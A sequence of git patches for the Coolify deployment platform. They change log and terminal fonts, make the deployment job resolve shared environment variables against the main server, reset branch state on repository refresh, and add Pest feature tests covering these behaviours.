--- a/resources/js/terminal.js
+++ b/resources/js/terminal.js
@@ -186,7 +186,7 @@ export function initializeTerminalComponent() {
                     this.term = new Terminal({
                         cols: 80,
                         rows: 30,
-                        fontFamily: '"Fira Code", courier-new, courier, monospace, "Powerline Extra Symbols"',
+                        fontFamily: '"Geist Mono", "SFMono-Regular", Menlo, Monaco, Consolas, "Liberation Mono", monospace, "Powerline Extra Symbols"',
                         cursorBlink: true,
                         rendererType: 'canvas',
                         convertEol: true,
diff --git a/resources/views/livewire/activity-monitor.blade.php b/resources/views/livewire/activity-monitor.blade.php
index 290a91857..72b68edd0 100644
--- a/resources/views/livewire/activity-monitor.blade.php
+++ b/resources/views/livewire/activity-monitor.blade.php
@@ -52,7 +52,7 @@
                 'flex-1 min-h-0' => $fullHeight,
                 'max-h-96' => !$fullHeight,
             ])>
-            <pre class="font-mono whitespace-pre-wrap" @if ($isPollingActive) wire:poll.1000ms="polling" @endif>{{ RunRemoteProcess::decodeOutput($activity) }}</pre>
+            <pre class="font-logs whitespace-pre-wrap" @if ($isPollingActive) wire:poll.1000ms="polling" @endif>{{ RunRemoteProcess::decodeOutput($activity) }}</pre>
         </div>
     @else
         @if ($showWaiting)
diff --git a/resources/views/livewire/project/application/deployment/show.blade.php b/resources/views/livewire/project/application/deployment/show.blade.php
index 28872f4bc..c17cda55f 100644
--- a/resources/views/livewire/project/application/deployment/show.blade.php
+++ b/resources/views/livewire/project/application/deployment/show.blade.php
@@ -330,7 +330,7 @@ class="p-1 text-gray-500 hover:text-gray-700 dark:text-gray-400 dark:hover:text-
                     <div id="logsContainer"
                         class="flex flex-col overflow-y-auto p-2 px-4 min-h-4 scrollbar"
                         :class="fullscreen ? 'flex-1' : 'max-h-[30rem]'">
-                        <div id="logs" class="flex flex-col font-mono">
+                        <div id="logs" class="flex flex-col font-logs">
                             <div x-show="searchQuery.trim() && matchCount === 0"
                                 class="text-gray-500 dark:text-gray-400 py-2">
                                 No matches found.
@@ -356,7 +356,7 @@ class="shrink-0 text-gray-500">{{ $line['timestamp'] }}</span>
                                         ])>{{ $lineContent }}</span>
                                 </div>
                             @empty
-                                <span class="font-mono text-neutral-400 mb-2">No logs yet.</span>
+                                <span class="font-logs text-neutral-400 mb-2">No logs yet.</span>
                             @endforelse
                         </div>
                     </div>
diff --git a/resources/views/livewire/project/shared/get-logs.blade.php b/resources/views/livewire/project/shared/get-logs.blade.php
index ee5b65cf5..cb2dcfed1 100644
--- a/resources/views/livewire/project/shared/get-logs.blade.php
+++ b/resources/views/livewire/project/shared/get-logs.blade.php
@@ -480,7 +480,7 @@ class="flex overflow-y-auto overflow-x-hidden flex-col px-4 py-2 w-full min-w-0
                         @php
                             $displayLines = collect(explode("\n", $outputs))->filter(fn($line) => trim($line) !== '');
                         @endphp
-                        <div id="logs" class="font-mono max-w-full cursor-default">
+                        <div id="logs" class="font-logs max-w-full cursor-default">
                             <div x-show="searchQuery.trim() && matchCount === 0"
                                 class="text-gray-500 dark:text-gray-400 py-2">
                                 No matches found.
@@ -518,7 +518,7 @@ class="text-gray-500 dark:text-gray-400 py-2">
                         </div>
                     @else
                         <pre id="logs"
-                            class="font-mono whitespace-pre-wrap break-all max-w-full text-neutral-400">No logs yet.</pre>
+                            class="font-logs whitespace-pre-wrap break-all max-w-full text-neutral-400">No logs yet.</pre>
                     @endif
                 </div>
             </div>
diff --git a/resources/views/livewire/server/docker-cleanup-executions.blade.php b/resources/views/livewire/server/docker-cleanup-executions.blade.php
index c59d53d26..d0b848cf1 100644
--- a/resources/views/livewire/server/docker-cleanup-executions.blade.php
+++ b/resources/views/livewire/server/docker-cleanup-executions.blade.php
@@ -100,7 +100,7 @@
                         <svg class="h-5 w-5 shrink-0 text-gray-500 dark:text-gray-400" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor">
                             <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M8 9l3 3-3 3m5 0h3M5 20h14a2 2 0 002-2V6a2 2 0 00-2-2H5a2 2 0 00-2 2v12a2 2 0 002 2z" />
                         </svg>
-                        <code class="flex-1 text-sm font-mono text-gray-700 dark:text-gray-300">{{ data_get($result, 'command') }}</code>
+                        <code class="flex-1 text-sm font-logs text-gray-700 dark:text-gray-300">{{ data_get($result, 'command') }}</code>
                     </div>
                     @php
                     $output = data_get($result, 'output');
@@ -108,7 +108,7 @@
                     @endphp
                     <div class="p-4">
                         @if($hasOutput)
-                        <pre class="font-mono text-sm text-gray-600 dark:text-gray-300 whitespace-pre-wrap">{{ $output }}</pre>
+                        <pre class="font-logs text-sm text-gray-600 dark:text-gray-300 whitespace-pre-wrap">{{ $output }}</pre>
                         @else
                         <p class="text-sm text-gray-500 dark:text-gray-400 italic">
                             No output returned - command completed successfully
diff --git a/tests/Feature/ClonePersistentVolumeUuidTest.php b/tests/Feature/ClonePersistentVolumeUuidTest.php
index f1ae8dd26..3f99c5585 100644
--- a/tests/Feature/ClonePersistentVolumeUuidTest.php
+++ b/tests/Feature/ClonePersistentVolumeUuidTest.php
@@ -1,15 +1,18 @@
 <?php
 
-use App\Livewire\Project\Shared\ResourceOperations;
 use App\Models\Application;
+use App\Models\ApplicationPreview;
+use App\Models\ApplicationSetting;
 use App\Models\Environment;
 use App\Models\LocalPersistentVolume;
 use App\Models\Project;
+use App\Models\ScheduledTask;
 use App\Models\Server;
-use App\Models\StandaloneDocker;
 use App\Models\Team;
 use App\Models\User;
-use Livewire\Livewire;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
 
 beforeEach(function () {
     $this->user = User::factory()->create();
@@ -17,7 +20,7 @@
     $this->user->teams()->attach($this->team, ['role' => 'owner']);
 
     $this->server = Server::factory()->create(['team_id' => $this->team->id]);
-    $this->destination = StandaloneDocker::factory()->create(['server_id' => $this->server->id]);
+    $this->destination = $this->server->standaloneDockers()->firstOrFail();
     $this->project = Project::factory()->create(['team_id' => $this->team->id]);
     $this->environment = Environment::factory()->create(['project_id' => $this->project->id]);
 
@@ -25,8 +28,13 @@
         'environment_id' => $this->environment->id,
         'destination_id' => $this->destination->id,
         'destination_type' => $this->destination->getMorphClass(),
+        'redirect' => 'both',
     ]);
 
+    $this->application->settings->forceFill([
+        'is_container_label_readonly_enabled' => false,
+    ])->save();
+
     $this->actingAs($this->user);
     session(['currentTeam' => $this->team]);
 });
@@ -82,3 +90,71 @@
     expect($clonedUuids)->each->not->toBeIn($originalUuids);
     expect(array_unique($clonedUuids))->toHaveCount(2);
 });
+
+test('cloning application reassigns settings to the cloned application', function () {
+    $this->application->settings->forceFill([
+        'is_static' => true,
+        'is_spa' => true,
+        'is_build_server_enabled' => true,
+    ])->save();
+
+    $newApp = clone_application($this->application, $this->destination, [
+        'environment_id' => $this->environment->id,
+    ]);
+
+    $sourceSettingsCount = ApplicationSetting::query()
+        ->where('application_id', $this->application->id)
+        ->count();
+    $clonedSettings = ApplicationSetting::query()
+        ->where('application_id', $newApp->id)
+        ->first();
+
+    expect($sourceSettingsCount)->toBe(1)
+        ->and($clonedSettings)->not->toBeNull()
+        ->and($clonedSettings?->application_id)->toBe($newApp->id)
+        ->and($clonedSettings?->is_static)->toBeTrue()
+        ->and($clonedSettings?->is_spa)->toBeTrue()
+        ->and($clonedSettings?->is_build_server_enabled)->toBeTrue();
+});
+
+test('cloning application reassigns scheduled tasks and previews to the cloned application', function () {
+    $scheduledTask = ScheduledTask::forceCreate([
+        'uuid' => 'scheduled-task-original',
+        'application_id' => $this->application->id,
+        'team_id' => $this->team->id,
+        'name' => 'nightly-task',
+        'command' => 'php artisan schedule:run',
+        'frequency' => '* * * * *',
+        'container' => 'app',
+        'timeout' => 120,
+    ]);
+
+    $preview = ApplicationPreview::forceCreate([
+        'uuid' => 'preview-original',
+        'application_id' => $this->application->id,
+        'pull_request_id' => 123,
+        'pull_request_html_url' => 'https://example.com/pull/123',
+        'fqdn' => 'https://preview.example.com',
+        'status' => 'running',
+    ]);
+
+    $newApp = clone_application($this->application, $this->destination, [
+        'environment_id' => $this->environment->id,
+    ]);
+
+    $clonedTask = ScheduledTask::query()
+        ->where('application_id', $newApp->id)
+        ->first();
+    $clonedPreview = ApplicationPreview::query()
+        ->where('application_id', $newApp->id)
+        ->first();
+
+    expect($clonedTask)->not->toBeNull()
+        ->and($clonedTask?->uuid)->not->toBe($scheduledTask->uuid)
+        ->and($clonedTask?->application_id)->toBe($newApp->id)
+        ->and($clonedTask?->team_id)->toBe($this->team->id)
+        ->and($clonedPreview)->not->toBeNull()
+        ->and($clonedPreview?->uuid)->not->toBe($preview->uuid)
+        ->and($clonedPreview?->application_id)->toBe($newApp->id)
+        ->and($clonedPreview?->status)->toBe('exited');
+});
diff --git a/tests/Feature/DatabaseSslStatusRefreshTest.php b/tests/Feature/DatabaseSslStatusRefreshTest.php
new file mode 100644
index 000000000..eab2b08db
--- /dev/null
+++ b/tests/Feature/DatabaseSslStatusRefreshTest.php
@@ -0,0 +1,77 @@
+<?php
+
+use App\Livewire\Project\Database\Dragonfly\General as DragonflyGeneral;
+use App\Livewire\Project\Database\Keydb\General as KeydbGeneral;
+use App\Livewire\Project\Database\Mariadb\General as MariadbGeneral;
+use App\Livewire\Project\Database\Mongodb\General as MongodbGeneral;
+use App\Livewire\Project\Database\Mysql\General as MysqlGeneral;
+use App\Livewire\Project\Database\Postgresql\General as PostgresqlGeneral;
+use App\Livewire\Project\Database\Redis\General as RedisGeneral;
+use App\Models\Environment;
+use App\Models\Project;
+use App\Models\Server;
+use App\Models\StandaloneDocker;
+use App\Models\StandaloneMysql;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Livewire\Livewire;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->team->members()->attach($this->user->id, ['role' => 'owner']);
+
+    $this->actingAs($this->user);
+    session(['currentTeam' => $this->team]);
+});
+
+dataset('ssl-aware-database-general-components', [
+    MysqlGeneral::class,
+    MariadbGeneral::class,
+    MongodbGeneral::class,
+    RedisGeneral::class,
+    PostgresqlGeneral::class,
+    KeydbGeneral::class,
+    DragonflyGeneral::class,
+]);
+
+it('maps database status broadcasts to refresh for ssl-aware database general components', function (string $componentClass) {
+    $component = app($componentClass);
+    $listeners = $component->getListeners();
+
+    expect($listeners["echo-private:user.{$this->user->id},DatabaseStatusChanged"])->toBe('refresh')
+        ->and($listeners["echo-private:team.{$this->team->id},ServiceChecked"])->toBe('refresh');
+})->with('ssl-aware-database-general-components');
+
+it('reloads the mysql database model when refreshing so ssl controls follow the latest status', function () {
+    $server = Server::factory()->create(['team_id' => $this->team->id]);
+    $destination = StandaloneDocker::where('server_id', $server->id)->first();
+    $project = Project::factory()->create(['team_id' => $this->team->id]);
+    $environment = Environment::factory()->create(['project_id' => $project->id]);
+
+    $database = StandaloneMysql::forceCreate([
+        'name' => 'test-mysql',
+        'image' => 'mysql:8',
+        'mysql_root_password' => 'password',
+        'mysql_user' => 'coolify',
+        'mysql_password' => 'password',
+        'mysql_database' => 'coolify',
+        'status' => 'exited:unhealthy',
+        'enable_ssl' => true,
+        'is_log_drain_enabled' => false,
+        'environment_id' => $environment->id,
+        'destination_id' => $destination->id,
+        'destination_type' => $destination->getMorphClass(),
+    ]);
+
+    $component = Livewire::test(MysqlGeneral::class, ['database' => $database])
+        ->assertDontSee('Database should be stopped to change this settings.');
+
+    $database->forceFill(['status' => 'running:healthy'])->save();
+
+    $component->call('refresh')
+        ->assertSee('Database should be stopped to change this settings.');
+});
diff --git a/tests/Feature/LogFontStylingTest.php b/tests/Feature/LogFontStylingTest.php
new file mode 100644
index 000000000..c7903fb45
--- /dev/null
+++ b/tests/Feature/LogFontStylingTest.php
@@ -0,0 +1,45 @@
+<?php
+
+it('registers geist mono from a local asset for log surfaces', function () {
+    $fontsCss = file_get_contents(resource_path('css/fonts.css'));
+    $appCss = file_get_contents(resource_path('css/app.css'));
+    $fontPath = resource_path('fonts/geist-mono-variable.woff2');
+    $geistSansPath = resource_path('fonts/geist-sans-variable.woff2');
+
+    expect($fontsCss)
+        ->toContain("font-family: 'Geist Mono'")
+        ->toContain("url('../fonts/geist-mono-variable.woff2')")
+        ->toContain("font-family: 'Geist Sans'")
+        ->toContain("url('../fonts/geist-sans-variable.woff2')")
+        ->and($appCss)
+        ->toContain("--font-sans: 'Geist Sans', Inter, sans-serif")
+        ->toContain('@apply min-h-screen text-sm font-sans antialiased scrollbar overflow-x-hidden;')
+        ->toContain("--font-logs: 'Geist Mono'")
+        ->toContain("--font-geist-sans: 'Geist Sans'")
+        ->and($fontPath)
+        ->toBeFile()
+        ->and($geistSansPath)
+        ->toBeFile();
+});
+
+it('uses geist mono for shared logs and terminal rendering', function () {
+    $sharedLogsView = file_get_contents(resource_path('views/livewire/project/shared/get-logs.blade.php'));
+    $deploymentLogsView = file_get_contents(resource_path('views/livewire/project/application/deployment/show.blade.php'));
+    $activityMonitorView = file_get_contents(resource_path('views/livewire/activity-monitor.blade.php'));
+    $dockerCleanupView = file_get_contents(resource_path('views/livewire/server/docker-cleanup-executions.blade.php'));
+    $terminalClient = file_get_contents(resource_path('js/terminal.js'));
+
+    expect($sharedLogsView)
+        ->toContain('class="font-logs max-w-full cursor-default"')
+        ->toContain('class="font-logs whitespace-pre-wrap break-all max-w-full text-neutral-400"')
+        ->and($deploymentLogsView)
+        ->toContain('class="flex flex-col font-logs"')
+        ->toContain('class="font-logs text-neutral-400 mb-2"')
+        ->and($activityMonitorView)
+        ->toContain('<pre class="font-logs whitespace-pre-wrap"')
+        ->and($dockerCleanupView)
+        ->toContain('class="flex-1 text-sm font-logs text-gray-700 dark:text-gray-300"')
+        ->toContain('class="font-logs text-sm text-gray-600 dark:text-gray-300 whitespace-pre-wrap"')
+        ->and($terminalClient)
+        ->toContain('"Geist Mono"');
+});
diff --git a/tests/Unit/ServiceParserImageUpdateTest.php b/tests/Unit/ServiceParserImageUpdateTest.php
index 526505098..649795866 100644
--- a/tests/Unit/ServiceParserImageUpdateTest.php
+++ b/tests/Unit/ServiceParserImageUpdateTest.php
@@ -41,7 +41,8 @@
     // The new code checks for null within the else block and creates only if needed
     expect($sharedFile)
         ->toContain('if (is_null($savedService)) {')
-        ->toContain('$savedService = ServiceDatabase::create([');
+        ->toContain('$savedService = ServiceDatabase::forceCreate([')
+        ->toContain('$savedService = ServiceApplication::forceCreate([');
 });
 
 it('verifies image update logic is present in parseDockerComposeFile', function () {

From 30751a60df77b2957d1af209cad4aee194fe799b Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 31 Mar 2026 11:07:52 +0200
Subject: [PATCH 205/213] fix(deployment): resolve shared env vars using main
 server

Use `$this->mainServer` when resolving environment variable values across
deployment env generation (runtime, buildtime, nixpacks, args, and secrets
hash) so shared server-scoped values are applied consistently.

Also add `server_id` to `SharedEnvironmentVariable::$fillable` and normalize
the Livewire Blade file newline.
---
 app/Jobs/ApplicationDeploymentJob.php         | 26 +++++++++----------
 app/Models/SharedEnvironmentVariable.php      |  1 +
 .../shared-variables/server/index.blade.php   |  2 +-
 3 files changed, 15 insertions(+), 14 deletions(-)

diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index b77fa85b8..3c52e03a1 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -1282,7 +1282,7 @@ private function generate_runtime_environment_variables()
             });
 
             foreach ($runtime_environment_variables as $env) {
-                $envs->push($env->key.'='.$env->getResolvedValueWithServer($this->server));
+                $envs->push($env->key.'='.$env->getResolvedValueWithServer($this->mainServer));
             }
 
             // Check for PORT environment variable mismatch with ports_exposes
@@ -1348,7 +1348,7 @@ private function generate_runtime_environment_variables()
             });
 
             foreach ($runtime_environment_variables_preview as $env) {
-                $envs->push($env->key.'='.$env->getResolvedValueWithServer($this->server));
+                $envs->push($env->key.'='.$env->getResolvedValueWithServer($this->mainServer));
             }
 
             // Fall back to production env vars for keys not overridden by preview vars,
@@ -1362,7 +1362,7 @@ private function generate_runtime_environment_variables()
                     return $env->is_runtime && ! in_array($env->key, $previewKeys);
                 });
                 foreach ($fallback_production_vars as $env) {
-                    $envs->push($env->key.'='.$env->getResolvedValueWithServer($this->server));
+                    $envs->push($env->key.'='.$env->getResolvedValueWithServer($this->mainServer));
                 }
             }
 
@@ -1604,7 +1604,7 @@ private function generate_buildtime_environment_variables()
             }
 
             foreach ($sorted_environment_variables as $env) {
-                $resolvedValue = $env->getResolvedValueWithServer($this->server);
+                $resolvedValue = $env->getResolvedValueWithServer($this->mainServer);
                 // For literal/multiline vars, real_value includes quotes that we need to remove
                 if ($env->is_literal || $env->is_multiline) {
                     // Strip outer quotes from real_value and apply proper bash escaping
@@ -1656,7 +1656,7 @@ private function generate_buildtime_environment_variables()
             }
 
             foreach ($sorted_environment_variables as $env) {
-                $resolvedValue = $env->getResolvedValueWithServer($this->server);
+                $resolvedValue = $env->getResolvedValueWithServer($this->mainServer);
                 // For literal/multiline vars, real_value includes quotes that we need to remove
                 if ($env->is_literal || $env->is_multiline) {
                     // Strip outer quotes from real_value and apply proper bash escaping
@@ -2394,7 +2394,7 @@ private function generate_nixpacks_env_variables()
         $this->env_nixpacks_args = collect([]);
         if ($this->pull_request_id === 0) {
             foreach ($this->application->nixpacks_environment_variables as $env) {
-                $resolvedValue = $env->getResolvedValueWithServer($this->server);
+                $resolvedValue = $env->getResolvedValueWithServer($this->mainServer);
                 if (! is_null($resolvedValue) && $resolvedValue !== '') {
                     $value = ($env->is_literal || $env->is_multiline) ? trim($resolvedValue, "'") : $resolvedValue;
                     $this->env_nixpacks_args->push('--env '.escapeShellValue("{$env->key}={$value}"));
@@ -2402,7 +2402,7 @@ private function generate_nixpacks_env_variables()
             }
         } else {
             foreach ($this->application->nixpacks_environment_variables_preview as $env) {
-                $resolvedValue = $env->getResolvedValueWithServer($this->server);
+                $resolvedValue = $env->getResolvedValueWithServer($this->mainServer);
                 if (! is_null($resolvedValue) && $resolvedValue !== '') {
                     $value = ($env->is_literal || $env->is_multiline) ? trim($resolvedValue, "'") : $resolvedValue;
                     $this->env_nixpacks_args->push('--env '.escapeShellValue("{$env->key}={$value}"));
@@ -2543,7 +2543,7 @@ private function generate_env_variables()
                 ->get();
 
             foreach ($envs as $env) {
-                $resolvedValue = $env->getResolvedValueWithServer($this->server);
+                $resolvedValue = $env->getResolvedValueWithServer($this->mainServer);
                 if (! is_null($resolvedValue)) {
                     $this->env_args->put($env->key, $resolvedValue);
                 }
@@ -2555,7 +2555,7 @@ private function generate_env_variables()
                 ->get();
 
             foreach ($envs as $env) {
-                $resolvedValue = $env->getResolvedValueWithServer($this->server);
+                $resolvedValue = $env->getResolvedValueWithServer($this->mainServer);
                 if (! is_null($resolvedValue)) {
                     $this->env_args->put($env->key, $resolvedValue);
                 }
@@ -3572,7 +3572,7 @@ private function generate_secrets_hash($variables)
         } else {
             $secrets_string = $variables
                 ->map(function ($env) {
-                    return "{$env->key}={$env->getResolvedValueWithServer($this->server)}";
+                    return "{$env->key}={$env->getResolvedValueWithServer($this->mainServer)}";
                 })
                 ->sort()
                 ->implode('|');
@@ -3638,7 +3638,7 @@ private function add_build_env_variables_to_dockerfile()
                 if (data_get($env, 'is_multiline') === true) {
                     $argsToInsert->push("ARG {$env->key}");
                 } else {
-                    $argsToInsert->push("ARG {$env->key}={$env->getResolvedValueWithServer($this->server)}");
+                    $argsToInsert->push("ARG {$env->key}={$env->getResolvedValueWithServer($this->mainServer)}");
                 }
             }
             // Add Coolify variables as ARGs
@@ -3660,7 +3660,7 @@ private function add_build_env_variables_to_dockerfile()
                 if (data_get($env, 'is_multiline') === true) {
                     $argsToInsert->push("ARG {$env->key}");
                 } else {
-                    $argsToInsert->push("ARG {$env->key}={$env->getResolvedValueWithServer($this->server)}");
+                    $argsToInsert->push("ARG {$env->key}={$env->getResolvedValueWithServer($this->mainServer)}");
                 }
             }
             // Add Coolify variables as ARGs
@@ -3696,7 +3696,7 @@ private function add_build_env_variables_to_dockerfile()
                 }
             }
             $envs_mapped = $envs->mapWithKeys(function ($env) {
-                return [$env->key => $env->getResolvedValueWithServer($this->server)];
+                return [$env->key => $env->getResolvedValueWithServer($this->mainServer)];
             });
             $secrets_hash = $this->generate_secrets_hash($envs_mapped);
             $argsToInsert->push("ARG COOLIFY_BUILD_SECRETS_HASH={$secrets_hash}");
diff --git a/app/Models/SharedEnvironmentVariable.php b/app/Models/SharedEnvironmentVariable.php
index bb1b29b9e..fa6fd45e0 100644
--- a/app/Models/SharedEnvironmentVariable.php
+++ b/app/Models/SharedEnvironmentVariable.php
@@ -17,6 +17,7 @@ class SharedEnvironmentVariable extends Model
         'team_id',
         'project_id',
         'environment_id',
+        'server_id',
 
         // Boolean flags
         'is_multiline',
diff --git a/resources/views/livewire/shared-variables/server/index.blade.php b/resources/views/livewire/shared-variables/server/index.blade.php
index 4183fee5b..f7522eb6a 100644
--- a/resources/views/livewire/shared-variables/server/index.blade.php
+++ b/resources/views/livewire/shared-variables/server/index.blade.php
@@ -22,4 +22,4 @@
             </div>
         @endforelse
     </div>
-</div>
\ No newline at end of file
+</div>

From 7638912fdc56e0ef92bfe13821ec6ee0ab07d548 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 31 Mar 2026 12:50:19 +0200
Subject: [PATCH 206/213] fix(github): reset branch state when refreshing
 repositories

Clear `branches` and `total_branches_count` in `loadRepositories` to avoid stale branch data after repo refreshes. Update the Livewire view to use the shared loading button pattern for refresh/load actions, and expand feature coverage for repository refresh behavior and refresh button visibility.
---
 .../Project/New/GithubPrivateRepository.php   |  2 +
 .../new/github-private-repository.blade.php   | 34 +++++------
 tests/Feature/GithubPrivateRepositoryTest.php | 60 +++++++++++++++----
 3 files changed, 65 insertions(+), 31 deletions(-)

diff --git a/app/Livewire/Project/New/GithubPrivateRepository.php b/app/Livewire/Project/New/GithubPrivateRepository.php
index 6aa8db085..9d4acb9bb 100644
--- a/app/Livewire/Project/New/GithubPrivateRepository.php
+++ b/app/Livewire/Project/New/GithubPrivateRepository.php
@@ -99,6 +99,8 @@ public function updatedBuildPack()
     public function loadRepositories($github_app_id)
     {
         $this->repositories = collect();
+        $this->branches = collect();
+        $this->total_branches_count = 0;
         $this->page = 1;
         $this->selected_github_app_id = $github_app_id;
         $this->github_app = GithubApp::where('id', $github_app_id)->first();
diff --git a/resources/views/livewire/project/new/github-private-repository.blade.php b/resources/views/livewire/project/new/github-private-repository.blade.php
index 27ef6a189..ec0d17506 100644
--- a/resources/views/livewire/project/new/github-private-repository.blade.php
+++ b/resources/views/livewire/project/new/github-private-repository.blade.php
@@ -4,27 +4,18 @@
         <x-modal-input buttonTitle="+ Add GitHub App" title="New GitHub App" closeOutside="false">
             <livewire:source.github.create />
         </x-modal-input>
+        @if ($repositories->count() > 0)
+            <x-forms.button wire:click.prevent="loadRepositories({{ $github_app->id }})">
+                Refresh Repository List
+            </x-forms.button>
+            <a target="_blank" class="inline-flex items-center self-center gap-1 text-sm hover:underline dark:text-neutral-400"
+                href="{{ getInstallationPath($github_app) }}">
+                Change Repositories on GitHub
+                <x-external-link />
+            </a>
+        @endif
     </div>
     <div class="pb-4">Deploy any public or private Git repositories through a GitHub App.</div>
-    @if ($repositories->count() > 0)
-        <div class="flex items-center gap-2 pb-4">
-            <a target="_blank" class="flex hover:no-underline" href="{{ getInstallationPath($github_app) }}">
-                <x-forms.button>
-                    Change Repositories on GitHub
-                    <x-external-link />
-                </x-forms.button>
-            </a>
-            <x-forms.button :showLoadingIndicator="false" wire:click.prevent="loadRepositories({{ $github_app->id }})" title="Refresh Repository List">
-                <svg class="w-4 h-4" wire:loading.remove wire:target="loadRepositories({{ $github_app->id }})" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor">
-                    <path stroke-linecap="round" stroke-linejoin="round" d="M16.023 9.348h4.992v-.001M2.985 19.644v-4.992m0 0h4.992m-4.993 0 3.181 3.183a8.25 8.25 0 0 0 13.803-3.7M4.031 9.865a8.25 8.25 0 0 1 13.803-3.7l3.181 3.182m0-4.991v4.99" />
-                </svg>
-                <svg class="w-4 h-4 animate-spin" wire:loading wire:target="loadRepositories({{ $github_app->id }})" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24">
-                    <circle class="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" stroke-width="4"></circle>
-                    <path class="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4zm2 5.291A7.962 7.962 0 014 12H0c0 3.042 1.135 5.824 3 7.938l3-2.647z"></path>
-                </svg>
-            </x-forms.button>
-        </div>
-    @endif
     @if ($github_apps->count() !== 0)
         <div class="flex flex-col gap-2">
             @if ($current_step === 'github_apps')
@@ -62,7 +53,10 @@
                                 @endforeach
                             </x-forms.datalist>
                         </div>
-                        <x-forms.button wire:click.prevent="loadBranches"> Load Repository </x-forms.button>
+                        <x-forms.button :showLoadingIndicator="false" wire:click.prevent="loadBranches" wire:target="loadBranches, selected_repository_id">
+                            Load Repository
+                            <x-loading-on-button wire:loading.delay wire:target="loadBranches, selected_repository_id" />
+                        </x-forms.button>
                     </div>
                 @else
                     <div>No repositories found. Check your GitHub App configuration.</div>
diff --git a/tests/Feature/GithubPrivateRepositoryTest.php b/tests/Feature/GithubPrivateRepositoryTest.php
index 19474caca..abc288519 100644
--- a/tests/Feature/GithubPrivateRepositoryTest.php
+++ b/tests/Feature/GithubPrivateRepositoryTest.php
@@ -31,7 +31,7 @@
         'team_id' => $this->team->id,
     ]);
 
-    $this->githubApp = GithubApp::create([
+    $this->githubApp = GithubApp::forceCreate([
         'name' => 'Test GitHub App',
         'api_url' => 'https://api.github.com',
         'html_url' => 'https://github.com',
@@ -86,27 +86,65 @@ function fakeGithubHttp(array $repositories): void
             ['id' => 1, 'name' => 'alpha-repo', 'owner' => ['login' => 'testuser']],
         ];
 
-        fakeGithubHttp($initialRepos);
-
-        $component = Livewire::test(GithubPrivateRepository::class, ['type' => 'private-gh-app'])
-            ->call('loadRepositories', $this->githubApp->id)
-            ->assertSet('total_repositories_count', 1);
-
-        // Simulate new repos becoming available after changing access on GitHub
         $updatedRepos = [
             ['id' => 1, 'name' => 'alpha-repo', 'owner' => ['login' => 'testuser']],
             ['id' => 2, 'name' => 'beta-repo', 'owner' => ['login' => 'testuser']],
             ['id' => 3, 'name' => 'gamma-repo', 'owner' => ['login' => 'testuser']],
         ];
 
-        fakeGithubHttp($updatedRepos);
+        $callCount = 0;
+        Http::fake([
+            'https://api.github.com/zen' => Http::response('Keep it logically awesome.', 200, [
+                'Date' => now()->toRfc7231String(),
+            ]),
+            'https://api.github.com/app/installations/67890/access_tokens' => Http::response([
+                'token' => 'fake-installation-token',
+            ], 201),
+            'https://api.github.com/installation/repositories*' => function () use (&$callCount, $initialRepos, $updatedRepos) {
+                $callCount++;
+                $repos = $callCount === 1 ? $initialRepos : $updatedRepos;
 
+                return Http::response([
+                    'total_count' => count($repos),
+                    'repositories' => $repos,
+                ], 200);
+            },
+        ]);
+
+        $component = Livewire::test(GithubPrivateRepository::class, ['type' => 'private-gh-app'])
+            ->call('loadRepositories', $this->githubApp->id)
+            ->assertSet('total_repositories_count', 1);
+
+        // Simulate new repos becoming available after changing access on GitHub
         $component
             ->call('loadRepositories', $this->githubApp->id)
             ->assertSet('total_repositories_count', 3)
             ->assertSet('current_step', 'repository');
     });
 
+    test('loadRepositories resets branches when refreshing', function () {
+        $repos = [
+            ['id' => 1, 'name' => 'alpha-repo', 'owner' => ['login' => 'testuser']],
+        ];
+
+        fakeGithubHttp($repos);
+
+        $component = Livewire::test(GithubPrivateRepository::class, ['type' => 'private-gh-app'])
+            ->call('loadRepositories', $this->githubApp->id);
+
+        // Manually set branches to simulate a previous branch load
+        $component->set('branches', collect([['name' => 'main'], ['name' => 'develop']]));
+        $component->set('total_branches_count', 2);
+
+        // Refresh repositories should reset branches
+        fakeGithubHttp($repos);
+
+        $component
+            ->call('loadRepositories', $this->githubApp->id)
+            ->assertSet('total_branches_count', 0)
+            ->assertSet('branches', collect());
+    });
+
     test('refresh button is visible when repositories are loaded', function () {
         $repos = [
             ['id' => 1, 'name' => 'alpha-repo', 'owner' => ['login' => 'testuser']],
@@ -116,11 +154,11 @@ function fakeGithubHttp(array $repositories): void
 
         Livewire::test(GithubPrivateRepository::class, ['type' => 'private-gh-app'])
             ->call('loadRepositories', $this->githubApp->id)
-            ->assertSeeHtml('title="Refresh Repository List"');
+            ->assertSee('Refresh Repository List');
     });
 
     test('refresh button is not visible before repositories are loaded', function () {
         Livewire::test(GithubPrivateRepository::class, ['type' => 'private-gh-app'])
-            ->assertDontSeeHtml('title="Refresh Repository List"');
+            ->assertDontSee('Refresh Repository List');
     });
 });

From 1a603a10ed9502399c155b075a5ec0f93b16682d Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 31 Mar 2026 13:45:31 +0200
Subject: [PATCH 207/213] fix(models): replace forceFill/forceCreate with
 fill/create and add fillable guards

Replace all uses of `forceFill`, `forceCreate`, and `forceFill` with their
non-force equivalents across models, actions, controllers, and Livewire
components. Add explicit `$fillable` arrays to all affected Eloquent models
to enforce mass assignment protection.

Add ModelFillableCreationTest and ModelFillableRegressionTest to verify that
model creation respects fillable constraints and prevent regressions.
---
